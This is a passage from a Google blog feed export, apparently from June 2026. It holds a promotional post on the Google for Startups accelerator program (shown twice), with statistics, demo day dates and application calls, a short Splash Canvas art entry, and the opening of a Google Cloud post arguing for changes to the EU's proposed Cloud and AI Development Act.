&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Sovereign-Level &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Policy &amp;amp; Strategic Wins&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Australia:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Accelerator alumni have successfully anchored the Google AI stack directly into the country's national R&amp;amp;D strategy, engaging directly with Members of Parliament in Canberra.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Canada:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Canadian Office of Innovation, Science, and Economic Development officially recognized and cited the impact of the Canada accelerator program in its formal report for the G7 Summit.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Cutting-Edge Frontier Programs&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This year marks a major expansion into specialized, frontier tech verticals:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The Google DeepMind Accelerator (Europe):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Dedicated strictly to hardening technical builds for AI-native robotics companies, effectively bridging the gap between lab prototyping and commercial market success.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;T&lt;/span&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;he GDM Accelerator (AI for Planet) in APAC&lt;/strong&gt;:&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; A joint initiative between Google DeepMind and Google's Sustainability teams. The program focuses heavily on biodiversity foundation models to position Google at the forefront of the critical ESG (Environmental, Social, and Governance) infrastructure market.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Japan Relaunch:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Marking a major strategic re-entry into one of Asia's most vital technology hubs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;The hive mind opportunity&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To maximize the power of this unique network, earlier this year we successfully transitioned our disparate regional alumni networks into a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Unified Alumni Community&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. We now bring together more than 1,750 startups and 3,000 founders across 90+ countries through shared online channels and the opportunity to attend in-person events, where founders get access to Google senior leadership and our newest models and tech, opportunities to directly influence the development of new Google products to better support their businesses’ growth, and learn from and support each other. &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Don't Miss It: Upcoming Demo Days&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The culmination of each of our intense accelerator journeys is &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Demo Day&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, where top-tier cohorts showcase their technical builds and new market-defining concepts. You can watch these milestones live streamed directly via the &lt;/span&gt;&lt;a href="https://www.youtube.com/@GoogleCloudEvents/featured" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Google for Startups events on YouTube&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Mark your calendar for the remaining 2026 showcases:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Summer &amp;amp; Fall 2026&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Africa Accelerator: June 19&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Middle East, North Africa, and Turkey Accelerator: June 26&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Korea Accelerator: July 15&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Brazil Accelerator: July 16&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Europe DeepMind Accelerator (Robotics): September 11&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;India: September 30&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Winter 2026&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;India Accelerator: November 4&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Southeast Asia Accelerator: November 13&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;North America Accelerator (Energy): November 19&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;South Africa Accelerator: December 11&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Europe and Israel (Energy): December 11&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Global Google.org Accelerator(Government Innovation): December 11&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Open &amp;amp; Upcoming Applications&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you are a founder or CTO looking to radically scale your technical infrastructure, optimize your product market-fit, and gain equity-free support from Google's global talent pool, applications are officially moving.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Applications Open Right Now:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GFSA Southeast Asia (Leverage the newly launched AI Startup Innovation Corridor connecting SEA to Silicon Valley)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GFSA China&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google.org Accelerator: AI for Science&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/scaling-the-next-generation-of-global-innovation-how-google-supports-top-startups-around-the-world" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-18T12:51:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/scaling-the-next-generation-of-global-innovation-how-google-supports-top-startups-around-the-world/</id>
    <title>Scaling the Next Generation of Global Innovation: How Google Supports Top Startups Around the World</title>
    <updated>2026-06-18T12:51:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the high-stakes world of tech entrepreneurship, the leap from a brilliant prototype to a scalable, market-defining business can be brutal. Founders need much more than capital; they need deep architectural guidance, sovereign-level policy alignment, and technical systems engineered to enable rapid growth. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Joy’s Law&lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;states: &lt;/strong&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;"[N]o matter who you are, most of the smartest people work for someone else."&lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recognize that true innovation inherently happens &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;“elsewhere.”&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This philosophy drives our active support of global accelerators across a diverse, geographic footprint of innovation markets to tap into this decentralized brilliance. For over a decade, our Google accelerator program has acted as a catalyst for this exact transition. By bridging the gap between raw entrepreneurial ambition and Google’s world-class engineering ecosystem, the program has quietly built one of the most resilient, high-performing startup portfolios on Earth.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;The Power of the Network: A Decade by the Numbers&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While many startup accelerators struggle with significant failure rates, our accelerator program has set a high bar for long-term success. By pairing top-tier founders and CTOs with customized, deeply technical engagement from Google, along with learned industry best practices, the program has consistently helped build both highly valuable companies and products. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The scope of this global network is impressive:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 99.7931%; height: 335px;"&gt;
&lt;tbody&gt;
&lt;tr style="height: 33.9702px;"&gt;
&lt;td style="width: 28.304%; height: 33.9702px;"&gt;&lt;em&gt;&lt;strong&gt;Metric&lt;/strong&gt;&lt;/em&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9702px; text-align: left;"&gt;&lt;em&gt;&lt;strong&gt;Impact to Date&lt;/strong&gt;&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 33.9702px;"&gt;
&lt;td style="width: 28.304%; height: 33.9702px;"&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Global Footprint&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9702px;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;2,011&lt;/strong&gt; startups supported across 88 countries&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 33.9702px;"&gt;
&lt;td style="width: 28.304%; height: 33.9702px;"&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Program Experience&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9702px;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;144&lt;/strong&gt; cohorts graduated over 10 years&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 33.9702px;"&gt;
&lt;td style="width: 28.304%; height: 33.9702px;"&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Survival Rate&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9702px;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;93%&lt;/strong&gt; portfolio survival rate&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 33.9702px;"&gt;
&lt;td style="width: 28.304%; height: 33.9702px;"&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Financial Momentum&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9702px;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;$46.3B &lt;/strong&gt;in funding raised; $135.1B collective portfolio valuation&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 33.9915px;"&gt;
&lt;td style="width: 28.304%; height: 33.9915px;"&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Startup Job Creation&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9915px;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;305,900 &lt;/strong&gt;employees across the entire startup portfolio&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt; &lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The Developer Value-Add:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; By design, this isn't a high-level business bootcamp. The founders of Accelerator startups identify a deeply technical problem that they then work on with bespoke support from Google to solve. These startups get access to Google engineers and product managers, along with access to our platforms and tools. From advising on architectures to optimizing AI model pipelines, Google experts work directly with the founding teams to help tackle some of their most complex technical hurdles.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Strategic Momentum: Geopolitics, Green Infrastructure, and Robotics&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The startup ecosystem is shifting rapidly, and our accelerator program is evolving along with it. This year, Google launched new initiatives  to support global economic development and explore and evolve critical environmental infrastructure. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Just a few examples:&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Sovereign-Level &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Policy &amp;amp; Strategic Wins&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Australia:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Accelerator alumni have successfully anchored the Google AI stack directly into the country's national R&amp;amp;D strategy, engaging directly with Members of Parliament in Canberra.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Canada:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Canadian Office of Innovation, Science, and Economic Development officially recognized and cited the impact of the Canada accelerator program in its formal report for the G7 Summit.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Cutting-Edge Frontier Programs&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This year marks a major expansion into specialized, frontier tech verticals:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The Google DeepMind Accelerator (Europe):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Dedicated strictly to hardening technical builds for AI-native robotics companies, effectively bridging the gap between lab prototyping and commercial market success.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;T&lt;/span&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;he GDM Accelerator (AI for Planet) in APAC&lt;/strong&gt;:&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; A joint initiative between Google DeepMind and Google's Sustainability teams. The program focuses heavily on biodiversity foundation models to position Google at the forefront of the critical ESG (Environmental, Social, and Governance) infrastructure market.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Japan Relaunch:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Marking a major strategic re-entry into one of Asia's most vital technology hubs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;The hive mind opportunity&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To maximize the power of this unique network, earlier this year we successfully transitioned our disparate regional alumni networks into a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Unified Alumni Community&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. We now bring together more than 1,750 startups and 3,000 founders across 90+ countries through shared online channels and the opportunity to attend in-person events, where founders get access to Google senior leadership and our newest models and tech, opportunities to directly influence the development of new Google products to better support their businesses’ growth, and learn from and support each other. &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Don't Miss It: Upcoming Demo Days&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The culmination of each of our intense accelerator journeys is &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Demo Day&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, where top-tier cohorts showcase their technical builds and new market-defining concepts. You can watch these milestones live streamed directly via the &lt;/span&gt;&lt;a href="https://www.youtube.com/@GoogleCloudEvents/featured" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Google for Startups events on YouTube&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Mark your calendar for the remaining 2026 showcases:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Summer &amp;amp; Fall 2026&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Africa Accelerator: June 19&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Middle East, North Africa, and Turkey Accelerator: June 26&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Korea Accelerator: July 15&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Brazil Accelerator: July 16&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Europe and Israel DeepMind Accelerator (Robotics): September 11&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;India: September 30&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Winter 2026&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;India Accelerator: November 4&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Southeast Asia Accelerator: November 13&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;North America Accelerator (Energy): November 19&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;South Africa Accelerator: December 11&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Europe and Israel (Energy): December 11&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Global Google.org Accelerator(Government Innovation): December 11&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Open &amp;amp; Upcoming Applications&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you are a founder or CTO looking to radically scale your technical infrastructure, optimize your product market-fit, and gain equity-free support from Google's global talent pool, applications are officially moving.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Applications Open Right Now:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GFSA Southeast Asia (Leverage the newly launched AI Startup Innovation Corridor connecting SEA to Silicon Valley)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GFSA China&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google.org Accelerator: AI for Science&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/scaling-the-next-generation-of-global-innovation-how-google-supports-top-startups-around-the-world/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-18T12:51:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/arts-culture/splash-canvas/</id>
    <title>Splash Canvas: Create abstract art (with an attitude)</title>
    <updated>2026-06-18T10:00:00+00:00</updated>
    <content type="html">A digital canvas showing a colorful abstract painting being created by 3D animated sea creatures, including octopuses, a squid, and turtles</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/arts-culture/splash-canvas/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-18T10:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/choice-compliance-and-collaboration-europes-path-to-open-digital-sovereignty</id>
    <title>Choice, compliance, and collaboration: Europe’s path to open digital sovereignty</title>
    <updated>2026-06-18T07:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The European Commission’s Tech Sovereignty Package comes at a defining moment for the continent's digital future. European competitiveness and security are top of the agenda for European business, institutions, and citizens, and a significant investment in European digital capacity is needed to deliver those goals. In that context, it is understandable that Europe is considering how to boost the European Union digital footprint from chips, to cloud adoption, to AI data infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The European Commission’s strategy is to be grounded in "openness, partnership, and fair competition." Indeed, the package contains bold measures consistent with these principles on interoperability to address vendor lock-in and an open source strategy for the public sector, as well as on more rapid data center deployment.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We will work cooperatively with the EU institutions providing our best knowledge about how to achieve these stated objectives in practical terms. To that end, we believe certain elements of the Cloud and AI Development Act (CADA) should be changed to avoid unintended market isolation, ensuring that trusted global partners can continue to support Europe’s security and scaling goals under a framework of true openness. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our approach to sovereignty, developed over many years, is grounded in delivering tangible, technical, and verifiable control and open choice, while investing in the growth and security of Europe’s digital infrastructure — consistent with what we understand to be the goals of this strategy. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We have engineered a comprehensive menu of &lt;/span&gt;&lt;a href="https://cloud.google.com/sovereign-cloud"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Sovereign Cloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; solutions, designed to meet Europe's tiered compliance requirements at every level. From standard public cloud configurations with strict European data boundaries to independently operated regional cloud services to fully air-gapped solutions for the most sensitive public-sector operations, we ensure that compliance never requires sacrificing technological excellence.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Through our deep “Made with Europe” collaborations with regional champions — including S3NS in France; Thales, the Schwarz Group, and T-Systems in Germany; PSN in Italy; Clarence in Luxembourg; and Telefónica in Spain — we are actively delivering the operational resilience and jurisdictional controls designed to meet the highest regulatory standards of existing sovereignty frameworks at national level. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Across our partner-led sovereign solutions, the S3NS offering in France has been qualified to meet &lt;/span&gt;&lt;a href="https://www.thalesgroup.com/en/news-centre/press-releases/s3ns-announces-secnumcloud-qualification-premi3ns-its-trusted-cloud" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SecNumCloud 3.2, Europe’s highest sovereignty regulatory bar&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Our partners Clarence and S3NS, together with Mistral, offer services that have been approved by the EU Directorate-General for Digital Services (DIGIT) for use by EU Institutions who have sovereign cloud needs. We believe this is what constitutes a true trusted partnership and encourage the Commission to follow this existing path, which is already meeting sovereign expectations across Europe today. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Refining sovereign certification &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A primary concern within the CADA proposal is the design of the Union Assurance Levels (UALs). While harmonizing sovereignty criteria across member states is a constructive step, criteria at each of the four UALs would limit or exclude global providers, regardless of the security mitigations they offer.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Regulations should create space for innovative and effective technology approaches to sovereign control, instead of rigid geographic criteria that sacrifice the potential to have control without undue disruption to global supply chains. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We understand and support the data sovereignty and extra-territorial risk-mitigation priorities of European policymakers. Through capabilities like Cloud External Key Manager (EKM), one of the tools within our suite of sovereign solutions, Google Cloud allows customers to maintain their encryption keys outside of Google's infrastructure. This control creates a technical barrier to unauthorized access to unencrypted data by third parties without the explicit consent and awareness of the customer. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The EU has already designed an alternative, more balanced model in the proposed &lt;/span&gt;&lt;a href="https://single-market-economy.ec.europa.eu/publications/industrial-accelerator-act_en" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Industrial Accelerator Act&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This framework has the potential to successfully maintain collaboration with trusted non-EU partners under a default presumption that trusted partners can operate as EU origin, underpinned by robust global trade rules and strong back-stop powers. We urge co-legislators to apply a similar philosophy to CADA.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Promoting interoperability, combating vendor lock-in, and reforming procurement&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Sovereignty must empower end-users with more choice, not less. A healthy European digital ecosystem requires open foundations that prevent vendor lock-in, restrict choice, and drive up costs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We strongly support CADA's goal to foster an open, interoperable cloud ecosystem. To make this meaningful, we believe that the policy must align with a commitment to openness across every level of the digital stack — infrastructure, models, and applications.&lt;/span&gt;&lt;/p&gt;
